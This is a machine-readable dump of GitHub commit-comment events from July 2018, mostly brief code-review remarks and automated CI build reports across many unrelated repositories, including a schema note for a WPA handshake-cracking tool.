{"id":"7990157213","type":"CommitCommentEvent","actor":{"login":"Telesphoreo"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29767014,"position":74,"line":206,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/CleanroomChunkGenerator.java","commit_id":"6eaf4c8d3e416fce34a659b8af332d21fb9d3943","created_at":"2018-07-19T16:05:52Z","updated_at":"2018-07-19T16:05:52Z","author_association":"OWNER","body":"This was a hacky solution to get the class to work at all. It loads all words fine but it has an error reading the config for the actual parameters"}},"created_at":"2018-07-19T16:05:52Z"}
{"id":"7990160261","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29767023,"position":21,"line":72,"path":"Applications/web_portal/web_app/library/source/pages/account_page/risk_page/risk_parameters_view.tsx","commit_id":"b07dd781c573c54fc5371370caee6cb6dd73058d","created_at":"2018-07-19T16:06:23Z","updated_at":"2018-07-19T16:06:23Z","author_association":"COLLABORATOR","body":"Don't split three times, instead do something like:\r\ntransitionTime = parameters.split();\r\n\r\nThen later in your code...\r\n\r\nfoo={transitionTime.hours}, bar={transitionTime.minutes}"}},"created_at":"2018-07-19T16:06:23Z"}
{"id":"7990162985","type":"CommitCommentEvent","actor":{"login":"shinoi2"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29767027,"position":5,"line":466,"path":"fireplace/actions.py","commit_id":"a6ee929c9678e2f40ae71b8ad2a6a31334d261d6","created_at":"2018-07-19T16:06:51Z","updated_at":"2018-07-19T16:06:51Z","author_association":"OWNER","body":"LOOT_535 巨龙召唤者的计数器"}},"created_at":"2018-07-19T16:06:51Z"}
{"id":"7990167014","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29767033,"position":7,"line":407,"path":"src/server/game/Handlers/SpellHandler.cpp","commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T16:07:35Z","updated_at":"2018-07-19T16:07:35Z","author_association":"MEMBER","body":"Packet modification maybe?"}},"created_at":"2018-07-19T16:07:35Z"}
{"id":"7990169297","type":"CommitCommentEvent","actor":{"login":"branscombj"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29767036,"position":null,"line":null,"path":null,"commit_id":"ba526065ede1cd1cbc5ace221dbe9e3b289764ab","created_at":"2018-07-19T16:07:59Z","updated_at":"2018-07-19T16:07:59Z","author_association":"COLLABORATOR","body":"[facilitate_19jul2018_quad.pptx](https://github.com/lzim/teampsd/files/2210753/facilitate_19jul2018_quad.pptx)\r\n"}},"created_at":"2018-07-19T16:07:59Z"}
{"id":"7990170498","type":"CommitCommentEvent","actor":{"login":"branscombj"},"repo":{"name":"lzim/teampsd"},"payload":{"comment":{"id":29767038,"position":null,"line":null,"path":null,"commit_id":"ba526065ede1cd1cbc5ace221dbe9e3b289764ab","created_at":"2018-07-19T16:08:12Z","updated_at":"2018-07-19T16:08:12Z","author_association":"COLLABORATOR","body":"update"}},"created_at":"2018-07-19T16:08:12Z"}
{"id":"7990172068","type":"CommitCommentEvent","actor":{"login":"thanhpm87"},"repo":{"name":"thanhpm87/dokmee"},"payload":{"comment":{"id":29767043,"position":null,"line":null,"path":null,"commit_id":"f51cfb9b235cfd1ebcc3c3643b424caadc2694c4","created_at":"2018-07-19T16:08:29Z","updated_at":"2018-07-19T16:08:29Z","author_association":"OWNER","body":"update status and preview file"}},"created_at":"2018-07-19T16:08:29Z"}
{"id":"7990176085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29767055,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-19T16:09:13Z","updated_at":"2018-07-19T16:09:13Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2925 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 17 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 606\n * Failed: 17\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.42%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T16:09:13Z"}
{"id":"7990178047","type":"CommitCommentEvent","actor":{"login":"ganlanyuan"},"repo":{"name":"ganlanyuan/tiny-slider"},"payload":{"comment":{"id":29767065,"position":null,"line":null,"path":null,"commit_id":"fd306a1b4a56bf4fc6da705ba90ac963f4b6eccf","created_at":"2018-07-19T16:09:35Z","updated_at":"2018-07-19T16:09:35Z","author_association":"OWNER","body":"You're right.\r\nActually the index was 0 based originally, so this is a fix, not a change."}},"created_at":"2018-07-19T16:09:35Z"}
{"id":"7990181297","type":"CommitCommentEvent","actor":{"login":"jose697pereira"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29767074,"position":null,"line":null,"path":null,"commit_id":"6126e03bafc09b177c194c68638e5b1f30be9601","created_at":"2018-07-19T16:10:11Z","updated_at":"2018-07-19T16:10:11Z","author_association":"NONE","body":"6126e03"}},"created_at":"2018-07-19T16:10:11Z"}
{"id":"7990182203","type":"CommitCommentEvent","actor":{"login":"anibalsolon"},"repo":{"name":"FCP-INDI/C-PAC"},"payload":{"comment":{"id":29767094,"position":null,"line":null,"path":null,"commit_id":"472c0b2fd80f471a3dc1467536298f7ce8154cd4","created_at":"2018-07-19T16:10:20Z","updated_at":"2018-07-19T16:10:20Z","author_association":"MEMBER","body":"Just testing comment"}},"created_at":"2018-07-19T16:10:20Z"}
{"id":"7990185476","type":"CommitCommentEvent","actor":{"login":"dzucconi"},"repo":{"name":"aredotna/ervell"},"payload":{"comment":{"id":29767102,"position":null,"line":null,"path":null,"commit_id":"beae0df657c7fae1ccdcde388bb0657309cb7a1f","created_at":"2018-07-19T16:10:55Z","updated_at":"2018-07-19T16:10:55Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-19T16:10:55Z"}
{"id":"7990189342","type":"CommitCommentEvent","actor":{"login":"jfabi"},"repo":{"name":"jfabi/infotouch"},"payload":{"comment":{"id":29767109,"position":1,"line":1,"path":".gitignore","commit_id":"16bab262c174dd932b5efc126f13614cf0035b9a","created_at":"2018-07-19T16:11:38Z","updated_at":"2018-07-19T16:11:38Z","author_association":"OWNER","body":"#security"}},"created_at":"2018-07-19T16:11:38Z"}
{"id":"7990192198","type":"CommitCommentEvent","actor":{"login":"esa-prakasa"},"repo":{"name":"esa-prakasa/opencv"},"payload":{"comment":{"id":29767114,"position":null,"line":null,"path":null,"commit_id":"1b6e5339b7922b1943774ca3e3882584f230ebd5","created_at":"2018-07-19T16:12:11Z","updated_at":"2018-07-19T16:12:11Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-19T16:12:11Z"}
{"id":"7990192868","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"evaleev/libint"},"payload":{"comment":{"id":29767115,"position":null,"line":null,"path":null,"commit_id":"7e6e5befe42bf1a5e81612f00ba51f19b52f453f","created_at":"2018-07-19T16:12:18Z","updated_at":"2018-07-19T16:12:18Z","author_association":"NONE","body":"Oh goodness, sorry. You definitely don't want it on AM=8 for appveyor. 8 takes hours. AM=4 will do for standalone tests. (All psi4's tests are runable with 5, and we usually build with 6 for production.) I just wanted to make sure that one _could_ compile up to 8. We had a situation before on Linux where one couldn't go higher than 7 because of stack/heap issues."}},"created_at":"2018-07-19T16:12:18Z"}
{"id":"7990198585","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29767133,"position":null,"line":null,"path":null,"commit_id":"9c154a9e1fa9b188e4ca5025802ef53803ab8568","created_at":"2018-07-19T16:13:23Z","updated_at":"2018-07-19T16:13:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-430](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-430).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-430-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T16:13:23Z"}
{"id":"7990200811","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29767137,"position":null,"line":null,"path":null,"commit_id":"9c154a9e1fa9b188e4ca5025802ef53803ab8568","created_at":"2018-07-19T16:13:47Z","updated_at":"2018-07-19T16:13:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-431](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-431).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-431-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T16:13:47Z"}
{"id":"7990204083","type":"CommitCommentEvent","actor":{"login":"PaulKlint"},"repo":{"name":"usethesource/rascal-core"},"payload":{"comment":{"id":29767143,"position":2,"line":2,"path":"src/org/rascalmpl/core/library/lang/rascalcore/check/GetGrammar.rsc","commit_id":"35a28079efa6c5a5980aec8ed6a31dc698ad1f02","created_at":"2018-07-19T16:14:24Z","updated_at":"2018-07-19T16:14:24Z","author_association":"MEMBER","body":"Your so right ;-)"}},"created_at":"2018-07-19T16:14:24Z"}
{"id":"7990207023","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29767146,"position":4,"line":8,"path":"README.md","commit_id":"adf5740b0c7d67860ee413d1d505d384ce57252d","created_at":"2018-07-19T16:14:56Z","updated_at":"2018-07-19T16:14:56Z","author_association":"OWNER","body":"## some comment"}},"created_at":"2018-07-19T16:14:56Z"}
{"id":"7990207997","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29767148,"position":null,"line":null,"path":null,"commit_id":"adf5740b0c7d67860ee413d1d505d384ce57252d","created_at":"2018-07-19T16:15:10Z","updated_at":"2018-07-19T16:15:10Z","author_association":"OWNER","body":"## more comments\r\n\r\nbla"}},"created_at":"2018-07-19T16:15:10Z"}
{"id":"7990209281","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29767155,"position":1,"line":1,"path":"app/controllers/users_controller.rb","commit_id":"5250fe3e13b20683ac81b340b8b68881e0123d2c","created_at":"2018-07-19T16:15:23Z","updated_at":"2018-07-19T16:15:23Z","author_association":"NONE","body":"this is not what the commit message suggests.\r\n"}},"created_at":"2018-07-19T16:15:23Z"}
{"id":"7990210543","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29767157,"position":null,"line":null,"path":null,"commit_id":"752083a53e841662650cb27a6a8c7fbb7c639874","created_at":"2018-07-19T16:15:36Z","updated_at":"2018-07-19T16:15:36Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/89/display/redirect) (on internal Jenkins) failed in stage 'Running XM tests on '10.14'' 🔥 : hudson.AbortException: Xamarin.Mac tests on macOS 10.14 failed (introspection)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/89//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/752083a53e841662650cb27a6a8c7fbb7c639874/89/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/752083a53e841662650cb27a6a8c7fbb7c639874/89/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/752083a53e841662650cb27a6a8c7fbb7c639874/89/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Xamarin.Mac tests on macOS 10.14 failed (introspection)](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/89/display/redirect) 🔥\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/752083a53e841662650cb27a6a8c7fbb7c639874/89/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * MTouch tests/NUnit: Failed (Execution failed with exit code 8)\n"}},"created_at":"2018-07-19T16:15:36Z"}
{"id":"7990213110","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29767164,"position":1,"line":3,"path":"README.md","commit_id":"7576adcc120abb57f7bb807d1774a7918d6e89d8","created_at":"2018-07-19T16:16:06Z","updated_at":"2018-07-19T16:16:06Z","author_association":"OWNER","body":"## comment\r\n\r\n1"}},"created_at":"2018-07-19T16:16:06Z"}
{"id":"7990213432","type":"CommitCommentEvent","actor":{"login":"pYr0x"},"repo":{"name":"stealjs/steal-tools"},"payload":{"comment":{"id":29767167,"position":null,"line":null,"path":null,"commit_id":"115b92af3a4ffc701c82e177839d7d3b6b863b41","created_at":"2018-07-19T16:16:10Z","updated_at":"2018-07-19T16:16:10Z","author_association":"CONTRIBUTOR","body":"thanks god :+1: "}},"created_at":"2018-07-19T16:16:10Z"}
{"id":"7990213979","type":"CommitCommentEvent","actor":{"login":"RGaudoin"},"repo":{"name":"RGaudoin/website"},"payload":{"comment":{"id":29767168,"position":null,"line":null,"path":null,"commit_id":"7576adcc120abb57f7bb807d1774a7918d6e89d8","created_at":"2018-07-19T16:16:15Z","updated_at":"2018-07-19T16:16:15Z","author_association":"OWNER","body":"## comment\r\n\r\n2"}},"created_at":"2018-07-19T16:16:15Z"}
{"id":"7990215164","type":"CommitCommentEvent","actor":{"login":"raimis"},"repo":{"name":"evaleev/libint"},"payload":{"comment":{"id":29767172,"position":null,"line":null,"path":null,"commit_id":"7e6e5befe42bf1a5e81612f00ba51f19b52f453f","created_at":"2018-07-19T16:16:29Z","updated_at":"2018-07-19T16:16:29Z","author_association":"NONE","body":"I'll verify, if it compiles and then decrease to 5, as was before."}},"created_at":"2018-07-19T16:16:29Z"}
{"id":"7990215778","type":"CommitCommentEvent","actor":{"login":"eugenioclrc"},"repo":{"name":"mukulhase/WebWhatsapp-Wrapper"},"payload":{"comment":{"id":29767173,"position":16,"line":180,"path":"webwhatsapi/js/wapi.js","commit_id":"51c14e645680b6976276d7da290f9c0d1f33c30f","created_at":"2018-07-19T16:16:37Z","updated_at":"2018-07-19T16:16:37Z","author_association":"NONE","body":"variable chats its undefined, shouldnt be?;\r\n\r\n> return chatsIds"}},"created_at":"2018-07-19T16:16:37Z"}
{"id":"7990216282","type":"CommitCommentEvent","actor":{"login":"quangson91"},"repo":{"name":"flutter/flutter-intellij"},"payload":{"comment":{"id":29767176,"position":4,"line":304,"path":"src/io/flutter/logging/FlutterLogTree.java","commit_id":"6c968f95ac54511d9deffdb244733d9946065941","created_at":"2018-07-19T16:16:43Z","updated_at":"2018-07-19T16:16:43Z","author_association":"CONTRIBUTOR","body":"I created a new PR to remove `volatile`.\r\nPlease take a look when u have time: https://github.com/flutter/flutter-intellij/pull/2494\r\n\r\nThanks!"}},"created_at":"2018-07-19T16:16:43Z"}
{"id":"7990217880","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29767180,"position":3,"line":3,"path":"app/controllers/users_controller.rb","commit_id":"5250fe3e13b20683ac81b340b8b68881e0123d2c","created_at":"2018-07-19T16:17:01Z","updated_at":"2018-07-19T16:17:01Z","author_association":"NONE","body":"if there is nothing there, then no point in giving a space."}},"created_at":"2018-07-19T16:17:01Z"}
{"id":"7990221485","type":"CommitCommentEvent","actor":{"login":"Und3rf10w"},"repo":{"name":"Und3rf10w/hashview"},"payload":{"comment":{"id":29767188,"position":null,"line":null,"path":null,"commit_id":"35dd23e350449e987daee1b8bee5068e6ed5bcb9","created_at":"2018-07-19T16:17:39Z","updated_at":"2018-07-19T16:17:39Z","author_association":"OWNER","body":"So this settles the final schema and the approach I'm gonna take to handle this.\r\n\r\n## Upload workflow\r\n1. User uploads hccapx\r\n  a. TODO: Verify that the uploaded file is a hccapx file (should pass `len_of_pcap % 363 == 0`)\r\n  b. TODO: Once verified as a hccapx, the user should be able to select whether the hashtype is `WPA/WPA2 PMK` or `WPA/WPA2`. I'm not sure that there's a difference in the way we need to handle the file as far as parsing, between the two, yet, but something to look into.\r\n2. hash reference to uploaded pcap is stored in `pcaps` table\r\n3. each handshake in the hccapx is parsed\r\n  a. handshake is base64'd and stored in the db in the `handshakes` table\r\n  b. ssid is extracted from the handshake, ssid stored in the `pcapfilehandshakes` table, with a reference to the `handshake_id` in the `handshakes` table.\r\n\r\n## Cracking workflow\r\n1. User selects pcap they wish to crack\r\n2. all handshakes for that `pcap` are extracted from the DB (that aren't already cracked), unbase64'd, and combined to create a temp hccapx that can be used for cracking.\r\n3. Hashcat cracks the hashes\r\n4. Newly cracked handshakes are updated in the `handshakes` table."}},"created_at":"2018-07-19T16:17:39Z"}
{"id":"7990231951","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29767199,"position":null,"line":null,"path":null,"commit_id":"cc2ac0a959a4b2a734edb7fe019c6c87921b0555","created_at":"2018-07-19T16:19:29Z","updated_at":"2018-07-19T16:19:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-19T16:19:29Z"}
{"id":"7990239032","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29767208,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-19T16:20:47Z","updated_at":"2018-07-19T16:20:47Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T16:20:47Z"}
{"id":"7990243564","type":"CommitCommentEvent","actor":{"login":"tbenr"},"repo":{"name":"status-im/status-react"},"payload":{"comment":{"id":29767214,"position":null,"line":null,"path":null,"commit_id":"2e57b1b8cfd02a7c0b24b12add444e34e87f43c6","created_at":"2018-07-19T16:21:40Z","updated_at":"2018-07-19T16:21:40Z","author_association":"CONTRIBUTOR","body":"is it possible that this build https://jenkins.status.im/blue/organizations/jenkins/status-react%2Fpull%20requests/detail/PR-5229/4/pipeline fails because of this change? "}},"created_at":"2018-07-19T16:21:40Z"}
{"id":"7990244425","type":"CommitCommentEvent","actor":{"login":"Chrisnetika"},"repo":{"name":"MalloyDelacroix/DownloaderForReddit"},"payload":{"comment":{"id":29767217,"position":null,"line":null,"path":null,"commit_id":"6be5d5a5145174eb56b53ab222941cabe648c331","created_at":"2018-07-19T16:21:50Z","updated_at":"2018-07-19T16:21:50Z","author_association":"NONE","body":"How can I use this new version on windows? What will I need? Might fix the issues I'm having."}},"created_at":"2018-07-19T16:21:50Z"}
{"id":"7990244736","type":"CommitCommentEvent","actor":{"login":"cellenar"},"repo":{"name":"seong954t/DoDreamEdu"},"payload":{"comment":{"id":29767219,"position":null,"line":null,"path":null,"commit_id":"e773a8e5c030b51630d4a801828cbfc1195903b2","created_at":"2018-07-19T16:21:53Z","updated_at":"2018-07-19T16:21:53Z","author_association":"CONTRIBUTOR","body":"https://github.com/cellenar/cellenar.github.io\r\n로 repository 이름 수정후, README.md에도 반영했습니다"}},"created_at":"2018-07-19T16:21:53Z"}
{"id":"7990250026","type":"CommitCommentEvent","actor":{"login":"atasro2"},"repo":{"name":"atasro2/pokeemerald"},"payload":{"comment":{"id":29767231,"position":null,"line":null,"path":null,"commit_id":"9bb23388a53b552abadfc81d5672887523f6e932","created_at":"2018-07-19T16:22:53Z","updated_at":"2018-07-19T16:22:53Z","author_association":"OWNER","body":"thanks whoever named wrote that function"}},"created_at":"2018-07-19T16:22:53Z"}
{"id":"7990250772","type":"CommitCommentEvent","actor":{"login":"svenfuchs"},"repo":{"name":"travis-ci/travis-conditions"},"payload":{"comment":{"id":29767233,"position":13,"line":20,"path":"README.md","commit_id":"cc54d095d5d11e5c02e47e86323ca8f6ec103c1c","created_at":"2018-07-19T16:23:02Z","updated_at":"2018-07-19T16:23:02Z","author_association":"MEMBER","body":"Thanks Ruud, bad copy/paste job. I've fixed the link now."}},"created_at":"2018-07-19T16:23:02Z"}
{"id":"7990251792","type":"CommitCommentEvent","actor":{"login":"TheGreat2201"},"repo":{"name":"Chinmay-Shivansh/IP_Project_Chinmay__Shivansh"},"payload":{"comment":{"id":29767234,"position":33,"line":33,"path":"IP__Project/src/ip__project/Feedback.java","commit_id":"c5633de17cad349de61840273483514dbec3f2ef","created_at":"2018-07-19T16:23:15Z","updated_at":"2018-07-19T16:23:15Z","author_association":"COLLABORATOR","body":"This line"}},"created_at":"2018-07-19T16:23:15Z"}
{"id":"7990287056","type":"CommitCommentEvent","actor":{"login":"Hikari-no-Tenshi"},"repo":{"name":"MiracleDROID-HnT/proprietary_vendor_xiaomi"},"payload":{"comment":{"id":29767298,"position":null,"line":null,"path":null,"commit_id":"4ee1613fcaf80ff16157031ae2e2a4bc614df1a0","created_at":"2018-07-19T16:29:50Z","updated_at":"2018-07-19T16:29:50Z","author_association":"CONTRIBUTOR","body":"VoLTE not working when current ims blobs moved to vendor."}},"created_at":"2018-07-19T16:29:50Z"}
{"id":"7990287088","type":"CommitCommentEvent","actor":{"login":"RajeshNaga"},"repo":{"name":"RajeshNaga/DiagonalScrollViewPath"},"payload":{"comment":{"id":29767300,"position":null,"line":null,"path":null,"commit_id":"d4a2b015fc6f93a668a23647a9d8d213bddf2d79","created_at":"2018-07-19T16:29:50Z","updated_at":"2018-07-19T16:29:50Z","author_association":"OWNER","body":"try try"}},"created_at":"2018-07-19T16:29:50Z"}
{"id":"7990287513","type":"CommitCommentEvent","actor":{"login":"dev4us"},"repo":{"name":"dev4us/react_native_WatchAndDo-by-dev4us"},"payload":{"comment":{"id":29767304,"position":null,"line":null,"path":null,"commit_id":"4dbd56246c403712c5bb3ad12e7f253674e4deac","created_at":"2018-07-19T16:29:55Z","updated_at":"2018-07-19T16:29:55Z","author_association":"OWNER","body":"https://github.com/dev4us/react_native_WatchAndDo-by-dev4us/issues/1 에 대한 조치\r\n\r\nthis merge file is answer about https://github.com/dev4us/react_native_WatchAndDo-by-dev4us/issues/1"}},"created_at":"2018-07-19T16:29:55Z"}
{"id":"7990289374","type":"CommitCommentEvent","actor":{"login":"gustavovalverde"},"repo":{"name":"it-projects-llc/pos-addons"},"payload":{"comment":{"id":29767310,"position":3,"line":2,"path":"pos_disable_payment/views.xml","commit_id":"c119f89c5b629e13af6b7a446e64ac022d48f955","created_at":"2018-07-19T16:30:17Z","updated_at":"2018-07-19T16:30:17Z","author_association":"NONE","body":"openerp?"}},"created_at":"2018-07-19T16:30:17Z"}
{"id":"7990292371","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29767316,"position":122,"line":394,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"b20adc7f7b0a600b87ec1e3b39c1fa6501d53b4e","created_at":"2018-07-19T16:30:50Z","updated_at":"2018-07-19T16:30:50Z","author_association":"MEMBER","body":"Please don't add such debug output."}},"created_at":"2018-07-19T16:30:50Z"}
{"id":"7990296259","type":"CommitCommentEvent","actor":{"login":"pbrocks"},"repo":{"name":"strangerstudios/memberlite"},"payload":{"comment":{"id":29767325,"position":null,"line":null,"path":null,"commit_id":"9fd685fe568dd9b552ff7ccdac9797865a294ac2","created_at":"2018-07-19T16:31:35Z","updated_at":"2018-07-19T16:31:35Z","author_association":"NONE","body":"Yep, works beautifully."}},"created_at":"2018-07-19T16:31:35Z"}
{"id":"7990297980","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"wbaumann/SmartReceiptsLibrary"},"payload":{"comment":{"id":29767330,"position":null,"line":null,"path":null,"commit_id":"0eff9437831f0c4f7bb478f577f9088cf97ba488","created_at":"2018-07-19T16:31:56Z","updated_at":"2018-07-19T16:31:56Z","author_association":"OWNER","body":"@JuliaSoboleva I've spent a while as of late addressing a variety of launch performance confirms due to using too many disk reads (eg `SharedPreference` calls, `Database` calls, etc). As of now, we're down to `0` violations and it launches much faster :)\r\n\r\nTo avoid future violations, I added a `penaltyDeath()` violation, which will crash the app (in `DEBUG` mode) if we have any more issues. Let me know if you come across anything on your end! \r\n\r\nFor the `SharedPreference` stuff, I've found what works best is moving all the constructor instances to `Lazy`, since it doesn't perform the read in the constructor. Here are some examples: https://github.com/wbaumann/SmartReceiptsLibrary/commit/ef463ccb7b205330c381ccb8c5851c65aad04d54\r\n\r\nJust some notes mostly in case you encounter this stuff :)"}},"created_at":"2018-07-19T16:31:56Z"}
{"id":"7990299759","type":"CommitCommentEvent","actor":{"login":"maelle"},"repo":{"name":"mstrimas/auk-blog-post"},"payload":{"comment":{"id":29767337,"position":null,"line":null,"path":null,"commit_id":"440e2cce0da47b07fbb56225aab77b1eb44ebe4d","created_at":"2018-07-19T16:32:16Z","updated_at":"2018-07-19T16:32:16Z","author_association":"NONE","body":"Btw I requested access to the EBD today 💃 🤓 "}},"created_at":"2018-07-19T16:32:16Z"}
{"id":"7990301598","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29767348,"position":145,"line":410,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"b20adc7f7b0a600b87ec1e3b39c1fa6501d53b4e","created_at":"2018-07-19T16:32:37Z","updated_at":"2018-07-19T16:32:37Z","author_association":"MEMBER","body":"As I said: It should be just the same as before. I don't see `resnet_size` anymore. Also where is `conv_time_dim`, `bottleneck`, `num_classes`? Why did you remove that?"}},"created_at":"2018-07-19T16:32:37Z"}
{"id":"7990303837","type":"CommitCommentEvent","actor":{"login":"maelle"},"repo":{"name":"mstrimas/auk-blog-post"},"payload":{"comment":{"id":29767358,"position":null,"line":null,"path":null,"commit_id":"440e2cce0da47b07fbb56225aab77b1eb44ebe4d","created_at":"2018-07-19T16:33:03Z","updated_at":"2018-07-19T16:33:03Z","author_association":"NONE","body":"> While hiking in the White Mountains in the early summer, I love listening for the turnover from Swainson's to Bicknell's Thrush as I move up in elevation. Let's see if this pattern is reflected in the data.\r\nSo cool!!"}},"created_at":"2018-07-19T16:33:03Z"}
{"id":"7990304460","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29767360,"position":null,"line":null,"path":null,"commit_id":"43ecf5f4051acba5ef9906d82d1fa9dc5e91ed35","created_at":"2018-07-19T16:33:11Z","updated_at":"2018-07-19T16:33:11Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.200.43ecf5f4051acba5ef9906d82d1fa9dc5e91ed35](http://build.palaso.org/viewLog.html?buildId=125114&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Failed to resolve artifact dependency Build time: 00:00:12"}},"created_at":"2018-07-19T16:33:11Z"}
{"id":"7990304571","type":"CommitCommentEvent","actor":{"login":"albertz"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29767361,"position":5,"line":29,"path":"TFUtil.py","commit_id":"edf11a66bec6116b006b3d20ccbf7b29d1f6a2f3","created_at":"2018-07-19T16:33:12Z","updated_at":"2018-07-19T16:33:12Z","author_association":"MEMBER","body":"Why did you remove the `+` in the expression?"}},"created_at":"2018-07-19T16:33:12Z"}
{"id":"7990306235","type":"CommitCommentEvent","actor":{"login":"blacknode"},"repo":{"name":"Pryancito/zeusircd"},"payload":{"comment":{"id":29767364,"position":null,"line":null,"path":null,"commit_id":"a66a2e2ca87c453d21d90c0229421de251f028bc","created_at":"2018-07-19T16:33:31Z","updated_at":"2018-07-19T16:33:31Z","author_association":"COLLABORATOR","body":"Nice ;)"}},"created_at":"2018-07-19T16:33:31Z"}
